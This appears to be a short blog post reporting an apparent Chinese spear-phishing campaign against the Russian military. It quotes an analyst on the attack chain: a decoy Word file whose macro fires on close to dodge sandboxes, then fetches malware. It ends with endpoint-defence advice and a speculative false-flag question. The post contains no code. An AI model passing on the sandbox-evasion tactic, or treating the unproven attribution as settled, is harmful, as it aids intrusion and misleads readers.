Even though Russia has highly advanced cyber attack capabilities, this does not mean they are immune to operations designed to breach their networks. It would seem China may have conducted a cyber attack against the Russian military:
“There is a world market for classified data of any time,” said Epstein. “There are documented cases in the past where private hackers hacked into various institutions and then sold the data to nation states. The lines are increasingly blurred in the world of cybersecurity.”
The attack starts with a well-written Russian-language email that seems to come from someone else in the targeted military division or an analyst section from the same group of the military, he said.
It comes with an attached document, a Microsoft Word file with a published article about the history of military testing in Russia.
“It’s a decoy document,” said Epstein. “You double-click on it, you open it, you read it, you think, ‘Ah, that was kind of interesting.’ Then you close it and you don’t think about it again. But when it closes, it activates a macro, and the macro triggers a secondary file to take action, which is to download a third file, which is the nasty stuff.”
That’s when the malware takes over the computer and everything the user has access to, the attackers now have access to.
“Any anti-virus program wouldn’t see a virus in the document because there’s no virus in the document,” he said. “And the trigger on closing is a common anti-sandboxing technique because most sandboxes check for triggering when documents are opened, not when they are closed.”
This is a fairly standard, yet highly advanced, technique for confusing endpoint anti-virus. This is why layered defenses extend beyond the network and need to be implemented at the endpoint level too. Tools like application whitelisting, host intrusion prevention, and desktop firewalls, when used together, can severely minimize the possibility of these types of malware from successfully executing.
Who here wonders if this attack was actually perpetrated by the United States but made to appear as if China is responsible?